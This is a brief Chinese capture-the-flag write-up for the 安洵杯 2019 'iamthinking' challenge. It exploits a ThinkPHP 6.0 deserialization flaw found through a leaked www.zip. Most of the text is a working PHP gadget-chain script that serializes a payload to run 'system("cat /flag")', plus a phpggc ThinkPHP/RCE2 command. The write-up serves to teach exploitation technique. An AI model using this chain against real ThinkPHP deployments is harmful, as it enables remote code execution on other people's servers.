# [安洵杯 2019] iamthinking
# ![1]()
dirsearch 搜集到 www.zip 文件:
发现是 thinkphp6.0 版本:
thinkphp6.0 有两个计较明显的漏洞:
一个文件上传:要开启 session(本题没开)
一个就是反序列化:本体有个 unserilize 函数
那就是反序列化了
php 脚本:
<?php
namespace think\model\concern;
trait Attribute
{
private $data = ["key" => ["key1" => "cat /flag"]];
private $withAttr = ["key"=>["key1"=>"system"]];
protected $json = ["key"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave;
protected $withEvent;
private $exists;
private $force;
protected $table;
protected $jsonAssoc;
function __construct($obj = '')
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->force = true;
$this->table = $obj;
$this->jsonAssoc = true;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
$c = array($b);
echo urlencode(serialize($c));
phpgcc 好像搞不了(首字母不能是 O,在
./phpggc -u ThinkPHP/RCE2 'system("cat /flag");'
出来的时候是 O 开头)
仔细的反序列化过程:https://xz.aliyun.com/t/6479?u_atoken=e1983cca7115bb73dc8261395f38e428&u_asig=1a0c399a17270782535993477e0035